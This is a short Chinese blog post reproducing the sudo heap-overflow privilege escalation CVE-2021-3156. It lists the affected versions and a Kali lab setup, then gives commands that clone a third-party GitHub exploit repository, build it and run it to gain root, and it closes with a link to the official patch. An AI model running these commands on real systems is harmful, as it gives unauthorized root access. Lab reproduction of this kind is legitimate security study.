Linux sudo权限提升漏洞复现(CVE-2021-3156)

Linux sudo权限提升漏洞复现(CVE-2021-3156)

1.简介

sudo是linux系统管理指令,是允许系统管理员让普通用户执行root命令的一个工具。

2.漏洞概述

  • 编号:CVE-2021-3156
    在sudo解析命令行参数的方式中发现了基于堆的缓冲区溢出。任何本地用户都可以利用此漏洞,不需要进行身份验证,也不用知道用户的密码。利用成功可以获得root权限。

3.影响版本

  • sudo 1.9.0 到 1.9.5p1 所有版本
  • sudo 1.8.2 到 1.8.31p2 所有版本

4.环境搭建

kali 2020 ,直接用虚拟机就可以了
用非root登录,我的是kali

5.漏洞复现

执行以下命令

git clone https://github.com/dengxmenglihua/sudo.git
cd sudo
chmod +x sudo
make
./sudo

运行截图,成功提权
kali:
在这里插入图片描述
ubuntu:
在这里插入图片描述

6.解决方案

  • 官方下载链接:https://www.sudo.ws/download.html
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值